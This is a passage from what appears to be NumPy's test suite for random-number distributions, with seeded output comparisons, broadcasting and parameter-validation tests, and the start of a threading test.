def test_dirichlet_bad_alpha(self):
# gh-2089
alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, np.random.mtrand.dirichlet, alpha)
def test_exponential(self):
np.random.seed(self.seed)
actual = np.random.exponential(1.1234, size=(3, 2))
desired = np.array([[1.08342649775011624, 1.00607889924557314],
[2.46628830085216721, 2.49668106809923884],
[0.68717433461363442, 1.69175666993575979]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_exponential_0(self):
assert_equal(np.random.exponential(scale=0), 0)
assert_raises(ValueError, np.random.exponential, scale=-0.)
def test_f(self):
np.random.seed(self.seed)
actual = np.random.f(12, 77, size=(3, 2))
desired = np.array([[1.21975394418575878, 1.75135759791559775],
[1.44803115017146489, 1.22108959480396262],
[1.02176975757740629, 1.34431827623300415]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
np.random.seed(self.seed)
actual = np.random.gamma(5, 3, size=(3, 2))
desired = np.array([[24.60509188649287182, 28.54993563207210627],
[26.13476110204064184, 12.56988482927716078],
[31.71863275789960568, 33.30143302795922011]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_gamma_0(self):
assert_equal(np.random.gamma(shape=0, scale=0), 0)
assert_raises(ValueError, np.random.gamma, shape=-0., scale=-0.)
def test_geometric(self):
np.random.seed(self.seed)
actual = np.random.geometric(.123456789, size=(3, 2))
desired = np.array([[8, 7],
[17, 17],
[5, 12]])
assert_array_equal(actual, desired)
def test_gumbel(self):
np.random.seed(self.seed)
actual = np.random.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.19591898743416816, 0.34405539668096674],
[-1.4492522252274278, -1.47374816298446865],
[1.10651090478803416, -0.69535848626236174]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gumbel_0(self):
assert_equal(np.random.gumbel(scale=0), 0)
assert_raises(ValueError, np.random.gumbel, scale=-0.)
def test_hypergeometric(self):
np.random.seed(self.seed)
actual = np.random.hypergeometric(10.1, 5.5, 14, size=(3, 2))
desired = np.array([[10, 10],
[10, 10],
[9, 9]])
assert_array_equal(actual, desired)
# Test nbad = 0
actual = np.random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
assert_array_equal(actual, desired)
actual = np.random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
assert_array_equal(actual, desired)
# Test ngood = 0
actual = np.random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
actual = np.random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
def test_laplace(self):
np.random.seed(self.seed)
actual = np.random.laplace(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.66599721112760157, 0.52829452552221945],
[3.12791959514407125, 3.18202813572992005],
[-0.05391065675859356, 1.74901336242837324]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_laplace_0(self):
assert_equal(np.random.laplace(scale=0), 0)
assert_raises(ValueError, np.random.laplace, scale=-0.)
def test_logistic(self):
np.random.seed(self.seed)
actual = np.random.logistic(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[1.09232835305011444, 0.8648196662399954],
[4.27818590694950185, 4.33897006346929714],
[-0.21682183359214885, 2.63373365386060332]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
np.random.seed(self.seed)
actual = np.random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
desired = np.array([[16.50698631688883822, 36.54846706092654784],
[22.67886599981281748, 0.71617561058995771],
[65.72798501792723869, 86.84341601437161273]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_lognormal_0(self):
assert_equal(np.random.lognormal(sigma=0), 1)
assert_raises(ValueError, np.random.lognormal, sigma=-0.)
def test_logseries(self):
np.random.seed(self.seed)
actual = np.random.logseries(p=.923456789, size=(3, 2))
desired = np.array([[2, 2],
[6, 17],
[3, 6]])
assert_array_equal(actual, desired)
def test_multinomial(self):
np.random.seed(self.seed)
actual = np.random.multinomial(20, [1/6.]*6, size=(3, 2))
desired = np.array([[[4, 3, 5, 4, 2, 2],
[5, 2, 8, 2, 2, 1]],
[[3, 4, 3, 6, 0, 4],
[2, 1, 4, 3, 6, 4]],
[[4, 4, 2, 5, 2, 3],
[4, 3, 4, 2, 3, 4]]])
assert_array_equal(actual, desired)
def test_multivariate_normal(self):
np.random.seed(self.seed)
mean = (.123456789, 10)
cov = [[1, 0], [0, 1]]
size = (3, 2)
actual = np.random.multivariate_normal(mean, cov, size)
desired = np.array([[[1.463620246718631, 11.73759122771936 ],
[1.622445133300628, 9.771356667546383]],
[[2.154490787682787, 12.170324946056553],
[1.719909438201865, 9.230548443648306]],
[[0.689515026297799, 9.880729819607714],
[-0.023054015651998, 9.201096623542879]]])
assert_array_almost_equal(actual, desired, decimal=15)
# Check for default size, was raising deprecation warning
actual = np.random.multivariate_normal(mean, cov)
desired = np.array([0.895289569463708, 9.17180864067987])
assert_array_almost_equal(actual, desired, decimal=15)
# Check that non positive-semidefinite covariance warns with
# RuntimeWarning
mean = [0, 0]
cov = [[1, 2], [2, 1]]
assert_warns(RuntimeWarning, np.random.multivariate_normal, mean, cov)
# and that it doesn't warn with RuntimeWarning check_valid='ignore'
assert_no_warnings(np.random.multivariate_normal, mean, cov,
check_valid='ignore')
# and that it raises with RuntimeWarning check_valid='raises'
assert_raises(ValueError, np.random.multivariate_normal, mean, cov,
check_valid='raise')
def test_negative_binomial(self):
np.random.seed(self.seed)
actual = np.random.negative_binomial(n=100, p=.12345, size=(3, 2))
desired = np.array([[848, 841],
[892, 611],
[779, 647]])
assert_array_equal(actual, desired)
def test_noncentral_chisquare(self):
np.random.seed(self.seed)
actual = np.random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array([[23.91905354498517511, 13.35324692733826346],
[31.22452661329736401, 16.60047399466177254],
[5.03461598262724586, 17.94973089023519464]])
assert_array_almost_equal(actual, desired, decimal=14)
actual = np.random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
desired = np.array([[1.47145377828516666, 0.15052899268012659],
[0.00943803056963588, 1.02647251615666169],
[0.332334982684171, 0.15451287602753125]])
assert_array_almost_equal(actual, desired, decimal=14)
np.random.seed(self.seed)
actual = np.random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array([[9.597154162763948, 11.725484450296079],
[10.413711048138335, 3.694475922923986],
[13.484222138963087, 14.377255424602957]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
np.random.seed(self.seed)
actual = np.random.noncentral_f(dfnum=5, dfden=2, nonc=1,
size=(3, 2))
desired = np.array([[1.40598099674926669, 0.34207973179285761],
[3.57715069265772545, 7.92632662577829805],
[0.43741599463544162, 1.1774208752428319]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
np.random.seed(self.seed)
actual = np.random.normal(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[2.80378370443726244, 3.59863924443872163],
[3.121433477601256, -0.33382987590723379],
[4.18552478636557357, 4.46410668111310471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_normal_0(self):
assert_equal(np.random.normal(scale=0), 0)
assert_raises(ValueError, np.random.normal, scale=-0.)
def test_pareto(self):
np.random.seed(self.seed)
actual = np.random.pareto(a=.123456789, size=(3, 2))
desired = np.array(
[[2.46852460439034849e+03, 1.41286880810518346e+03],
[5.28287797029485181e+07, 6.57720981047328785e+07],
[1.40840323350391515e+02, 1.98390255135251704e+05]])
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# http://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
np.random.seed(self.seed)
actual = np.random.poisson(lam=.123456789, size=(3, 2))
desired = np.array([[0, 0],
[1, 0],
[0, 0]])
assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo('l').max
lamneg = -1
assert_raises(ValueError, np.random.poisson, lamneg)
assert_raises(ValueError, np.random.poisson, [lamneg]*10)
assert_raises(ValueError, np.random.poisson, lambig)
assert_raises(ValueError, np.random.poisson, [lambig]*10)
def test_power(self):
np.random.seed(self.seed)
actual = np.random.power(a=.123456789, size=(3, 2))
desired = np.array([[0.02048932883240791, 0.01424192241128213],
[0.38446073748535298, 0.39499689943484395],
[0.00177699707563439, 0.13115505880863756]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
np.random.seed(self.seed)
actual = np.random.rayleigh(scale=10, size=(3, 2))
desired = np.array([[13.8882496494248393, 13.383318339044731],
[20.95413364294492098, 21.08285015800712614],
[11.06066537006854311, 17.35468505778271009]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_rayleigh_0(self):
assert_equal(np.random.rayleigh(scale=0), 0)
assert_raises(ValueError, np.random.rayleigh, scale=-0.)
def test_standard_cauchy(self):
np.random.seed(self.seed)
actual = np.random.standard_cauchy(size=(3, 2))
desired = np.array([[0.77127660196445336, -6.55601161955910605],
[0.93582023391158309, -2.07479293013759447],
[-4.74601644297011926, 0.18338989290760804]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
np.random.seed(self.seed)
actual = np.random.standard_exponential(size=(3, 2))
desired = np.array([[0.96441739162374596, 0.89556604882105506],
[2.1953785836319808, 2.22243285392490542],
[0.6116915921431676, 1.50592546727413201]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_gamma(self):
np.random.seed(self.seed)
actual = np.random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[5.50841531318455058, 6.62953470301903103],
[5.93988484943779227, 2.31044849402133989],
[7.54838614231317084, 8.012756093271868]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_gamma_0(self):
assert_equal(np.random.standard_gamma(shape=0), 0)
assert_raises(ValueError, np.random.standard_gamma, shape=-0.)
def test_standard_normal(self):
np.random.seed(self.seed)
actual = np.random.standard_normal(size=(3, 2))
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_t(self):
np.random.seed(self.seed)
actual = np.random.standard_t(df=10, size=(3, 2))
desired = np.array([[0.97140611862659965, -0.08830486548450577],
[1.36311143689505321, -0.55317463909867071],
[-0.18473749069684214, 0.61181537341755321]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
np.random.seed(self.seed)
actual = np.random.triangular(left=5.12, mode=10.23, right=20.34,
size=(3, 2))
desired = np.array([[12.68117178949215784, 12.4129206149193152],
[16.20131377335158263, 16.25692138747600524],
[11.20400690911820263, 14.4978144835829923]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
np.random.seed(self.seed)
actual = np.random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array([[6.99097932346268003, 6.73801597444323974],
[9.50364421400426274, 9.53130618907631089],
[5.48995325769805476, 8.47493103280052118]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo('float').min
fmax = np.finfo('float').max
func = np.random.uniform
assert_raises(OverflowError, func, -np.inf, 0)
assert_raises(OverflowError, func, 0, np.inf)
assert_raises(OverflowError, func, fmin, fmax)
assert_raises(OverflowError, func, [-np.inf], [0])
assert_raises(OverflowError, func, [0], [np.inf])
# (fmax / 1e17) - fmin is within range, so this should not throw
# account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX >
# DBL_MAX by increasing fmin a bit
np.random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17)
def test_scalar_exception_propagation(self):
# Tests that exceptions are correctly propagated in distributions
# when called with objects that throw exceptions when converted to
# scalars.
#
# Regression test for gh: 8865
class ThrowingFloat(np.ndarray):
def __float__(self):
raise TypeError
throwing_float = np.array(1.0).view(ThrowingFloat)
assert_raises(TypeError, np.random.uniform, throwing_float, throwing_float)
class ThrowingInteger(np.ndarray):
def __int__(self):
raise TypeError
throwing_int = np.array(1).view(ThrowingInteger)
assert_raises(TypeError, np.random.hypergeometric, throwing_int, 1, 1)
def test_vonmises(self):
np.random.seed(self.seed)
actual = np.random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array([[2.28567572673902042, 2.89163838442285037],
[0.38198375564286025, 2.57638023113890746],
[1.19153771588353052, 1.83509849681825354]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
# check infinite loop, gh-4720
np.random.seed(self.seed)
r = np.random.vonmises(mu=0., kappa=1.1e-8, size=10**6)
np.testing.assert_(np.isfinite(r).all())
def test_wald(self):
np.random.seed(self.seed)
actual = np.random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array([[3.82935265715889983, 5.13125249184285526],
[0.35045403618358717, 1.50832396872003538],
[0.24124319895843183, 0.22031101461955038]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
np.random.seed(self.seed)
actual = np.random.weibull(a=1.23, size=(3, 2))
desired = np.array([[0.97097342648766727, 0.91422896443565516],
[1.89517770034962929, 1.91414357960479564],
[0.67057783752390987, 1.39494046635066793]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_weibull_0(self):
assert_equal(np.random.weibull(a=0), 0)
assert_raises(ValueError, np.random.weibull, a=-0.)
def test_zipf(self):
np.random.seed(self.seed)
actual = np.random.zipf(a=1.23, size=(3, 2))
desired = np.array([[66, 29],
[1, 1],
[3, 13]])
assert_array_equal(actual, desired)
class TestBroadcast(object):
# tests that functions that broadcast behave
# correctly when presented with non-scalar arguments
def setup(self):
self.seed = 123456789
def setSeed(self):
np.random.seed(self.seed)
# TODO: Include test for randint once it can broadcast
# Can steal the test written in PR #6938
def test_uniform(self):
low = [0]
high = [1]
uniform = np.random.uniform
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.setSeed()
actual = uniform(low * 3, high)
assert_array_almost_equal(actual, desired, decimal=14)
self.setSeed()
actual = uniform(low, high * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
loc = [0]
scale = [1]
bad_scale = [-1]
normal = np.random.normal
desired = np.array([2.2129019979039612,
2.1283977976520019,
1.8417114045748335])
self.setSeed()
actual = normal(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc * 3, bad_scale)
self.setSeed()
actual = normal(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc, bad_scale * 3)
def test_beta(self):
a = [1]
b = [2]
bad_a = [-1]
bad_b = [-2]
beta = np.random.beta
desired = np.array([0.19843558305989056,
0.075230336409423643,
0.24976865978980844])
self.setSeed()
actual = beta(a * 3, b)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a * 3, b)
assert_raises(ValueError, beta, a * 3, bad_b)
self.setSeed()
actual = beta(a, b * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a, b * 3)
assert_raises(ValueError, beta, a, bad_b * 3)
def test_exponential(self):
scale = [1]
bad_scale = [-1]
exponential = np.random.exponential
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = exponential(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, exponential, bad_scale * 3)
def test_standard_gamma(self):
shape = [1]
bad_shape = [-1]
std_gamma = np.random.standard_gamma
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = std_gamma(shape * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, std_gamma, bad_shape * 3)
def test_gamma(self):
shape = [1]
scale = [2]
bad_shape = [-1]
bad_scale = [-2]
gamma = np.random.gamma
desired = np.array([1.5221370731769048,
1.5277256455738331,
1.4248762625178359])
self.setSeed()
actual = gamma(shape * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape * 3, scale)
assert_raises(ValueError, gamma, shape * 3, bad_scale)
self.setSeed()
actual = gamma(shape, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape, scale * 3)
assert_raises(ValueError, gamma, shape, bad_scale * 3)
def test_f(self):
dfnum = [1]
dfden = [2]
bad_dfnum = [-1]
bad_dfden = [-2]
f = np.random.f
desired = np.array([0.80038951638264799,
0.86768719635363512,
2.7251095168386801])
self.setSeed()
actual = f(dfnum * 3, dfden)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum * 3, dfden)
assert_raises(ValueError, f, dfnum * 3, bad_dfden)
self.setSeed()
actual = f(dfnum, dfden * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum, dfden * 3)
assert_raises(ValueError, f, dfnum, bad_dfden * 3)
def test_noncentral_f(self):
dfnum = [2]
dfden = [3]
nonc = [4]
bad_dfnum = [0]
bad_dfden = [-1]
bad_nonc = [-2]
nonc_f = np.random.noncentral_f
desired = np.array([9.1393943263705211,
13.025456344595602,
8.8018098359100545])
self.setSeed()
actual = nonc_f(dfnum * 3, dfden, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc)
self.setSeed()
actual = nonc_f(dfnum, dfden * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc)
self.setSeed()
actual = nonc_f(dfnum, dfden, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3)
def test_noncentral_f_small_df(self):
self.setSeed()
desired = np.array([6.869638627492048, 0.785880199263955])
actual = np.random.noncentral_f(0.9, 0.9, 2, size=2)
assert_array_almost_equal(actual, desired, decimal=14)
def test_chisquare(self):
df = [1]
bad_df = [-1]
chisquare = np.random.chisquare
desired = np.array([0.57022801133088286,
0.51947702108840776,
0.1320969254923558])
self.setSeed()
actual = chisquare(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, chisquare, bad_df * 3)
def test_noncentral_chisquare(self):
df = [1]
nonc = [2]
bad_df = [-1]
bad_nonc = [-2]
nonc_chi = np.random.noncentral_chisquare
desired = np.array([9.0015599467913763,
4.5804135049718742,
6.0872302432834564])
self.setSeed()
actual = nonc_chi(df * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df * 3, nonc)
assert_raises(ValueError, nonc_chi, df * 3, bad_nonc)
self.setSeed()
actual = nonc_chi(df, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df, nonc * 3)
assert_raises(ValueError, nonc_chi, df, bad_nonc * 3)
def test_standard_t(self):
df = [1]
bad_df = [-1]
t = np.random.standard_t
desired = np.array([3.0702872575217643,
5.8560725167361607,
1.0274791436474273])
self.setSeed()
actual = t(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, t, bad_df * 3)
def test_vonmises(self):
mu = [2]
kappa = [1]
bad_kappa = [-1]
vonmises = np.random.vonmises
desired = np.array([2.9883443664201312,
-2.7064099483995943,
-1.8672476700665914])
self.setSeed()
actual = vonmises(mu * 3, kappa)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu * 3, bad_kappa)
self.setSeed()
actual = vonmises(mu, kappa * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu, bad_kappa * 3)
def test_pareto(self):
a = [1]
bad_a = [-1]
pareto = np.random.pareto
desired = np.array([1.1405622680198362,
1.1465519762044529,
1.0389564467453547])
self.setSeed()
actual = pareto(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, pareto, bad_a * 3)
def test_weibull(self):
a = [1]
bad_a = [-1]
weibull = np.random.weibull
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = weibull(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, weibull, bad_a * 3)
def test_power(self):
a = [1]
bad_a = [-1]
power = np.random.power
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.setSeed()
actual = power(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, power, bad_a * 3)
def test_laplace(self):
loc = [0]
scale = [1]
bad_scale = [-1]
laplace = np.random.laplace
desired = np.array([0.067921356028507157,
0.070715642226971326,
0.019290950698972624])
self.setSeed()
actual = laplace(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc * 3, bad_scale)
self.setSeed()
actual = laplace(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc, bad_scale * 3)
def test_gumbel(self):
loc = [0]
scale = [1]
bad_scale = [-1]
gumbel = np.random.gumbel
desired = np.array([0.2730318639556768,
0.26936705726291116,
0.33906220393037939])
self.setSeed()
actual = gumbel(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc * 3, bad_scale)
self.setSeed()
actual = gumbel(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc, bad_scale * 3)
def test_logistic(self):
loc = [0]
scale = [1]
bad_scale = [-1]
logistic = np.random.logistic
desired = np.array([0.13152135837586171,
0.13675915696285773,
0.038216792802833396])
self.setSeed()
actual = logistic(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc * 3, bad_scale)
self.setSeed()
actual = logistic(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc, bad_scale * 3)
def test_lognormal(self):
mean = [0]
sigma = [1]
bad_sigma = [-1]
lognormal = np.random.lognormal
desired = np.array([9.1422086044848427,
8.4013952870126261,
6.3073234116578671])
self.setSeed()
actual = lognormal(mean * 3, sigma)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean * 3, bad_sigma)
self.setSeed()
actual = lognormal(mean, sigma * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean, bad_sigma * 3)
def test_rayleigh(self):
scale = [1]
bad_scale = [-1]
rayleigh = np.random.rayleigh
desired = np.array([1.2337491937897689,
1.2360119924878694,
1.1936818095781789])
self.setSeed()
actual = rayleigh(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, rayleigh, bad_scale * 3)
def test_wald(self):
mean = [0.5]
scale = [1]
bad_mean = [0]
bad_scale = [-2]
wald = np.random.wald
desired = np.array([0.11873681120271318,
0.12450084820795027,
0.9096122728408238])
self.setSeed()
actual = wald(mean * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean * 3, scale)
assert_raises(ValueError, wald, mean * 3, bad_scale)
self.setSeed()
actual = wald(mean, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean, scale * 3)
assert_raises(ValueError, wald, mean, bad_scale * 3)
def test_triangular(self):
left = [1]
right = [3]
mode = [2]
bad_left_one = [3]
bad_mode_one = [4]
bad_left_two, bad_mode_two = right * 2
triangular = np.random.triangular
desired = np.array([2.03339048710429,
2.0347400359389356,
2.0095991069536208])
self.setSeed()
actual = triangular(left * 3, mode, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one * 3, mode, right)
assert_raises(ValueError, triangular, left * 3, bad_mode_one, right)
assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two, right)
self.setSeed()
actual = triangular(left, mode * 3, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode * 3, right)
assert_raises(ValueError, triangular, left, bad_mode_one * 3, right)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3, right)
self.setSeed()
actual = triangular(left, mode, right * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode, right * 3)
assert_raises(ValueError, triangular, left, bad_mode_one, right * 3)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two, right * 3)
def test_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
binom = np.random.binomial
desired = np.array([1, 1, 1])
self.setSeed()
actual = binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n * 3, p)
assert_raises(ValueError, binom, n * 3, bad_p_one)
assert_raises(ValueError, binom, n * 3, bad_p_two)
self.setSeed()
actual = binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n, p * 3)
assert_raises(ValueError, binom, n, bad_p_one * 3)
assert_raises(ValueError, binom, n, bad_p_two * 3)
def test_negative_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
neg_binom = np.random.negative_binomial
desired = np.array([1, 0, 1])
self.setSeed()
actual = neg_binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n * 3, p)
assert_raises(ValueError, neg_binom, n * 3, bad_p_one)
assert_raises(ValueError, neg_binom, n * 3, bad_p_two)
self.setSeed()
actual = neg_binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n, p * 3)
assert_raises(ValueError, neg_binom, n, bad_p_one * 3)
assert_raises(ValueError, neg_binom, n, bad_p_two * 3)
def test_poisson(self):
max_lam = np.random.RandomState().poisson_lam_max
lam = [1]
bad_lam_one = [-1]
bad_lam_two = [max_lam * 2]
poisson = np.random.poisson
desired = np.array([1, 1, 0])
self.setSeed()
actual = poisson(lam * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, poisson, bad_lam_one * 3)
assert_raises(ValueError, poisson, bad_lam_two * 3)
def test_zipf(self):
a = [2]
bad_a = [0]
zipf = np.random.zipf
desired = np.array([2, 2, 1])
self.setSeed()
actual = zipf(a * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, zipf, bad_a * 3)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, zipf, np.nan)
assert_raises(ValueError, zipf, [0, 0, np.nan])
def test_geometric(self):
p = [0.5]
bad_p_one = [-1]
bad_p_two = [1.5]
geom = np.random.geometric
desired = np.array([2, 2, 2])
self.setSeed()
actual = geom(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, geom, bad_p_one * 3)
assert_raises(ValueError, geom, bad_p_two * 3)
def test_hypergeometric(self):
ngood = [1]
nbad = [2]
nsample = [2]
bad_ngood = [-1]
bad_nbad = [-2]
bad_nsample_one = [0]
bad_nsample_two = [4]
hypergeom = np.random.hypergeometric
desired = np.array([1, 1, 1])
self.setSeed()
actual = hypergeom(ngood * 3, nbad, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood * 3, nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, bad_nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_two)
self.setSeed()
actual = hypergeom(ngood, nbad * 3, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, bad_nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_two)
self.setSeed()
actual = hypergeom(ngood, nbad, nsample * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3)
def test_logseries(self):
p = [0.5]
bad_p_one = [2]
bad_p_two = [-1]
logseries = np.random.logseries
desired = np.array([1, 1, 1])
self.setSeed()
actual = logseries(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, logseries, bad_p_one * 3)
assert_raises(ValueError, logseries, bad_p_two * 3)
class TestThread(object):
# make sure each state produces the same sequence even in threads
def setup(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [Thread(target=function, args=(np.random.RandomState(s), o))
for s, o in zip(self.seeds, out1)]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
function(np.random.RandomState(s), o)
# these platforms change x87 fpu precision mode in threads
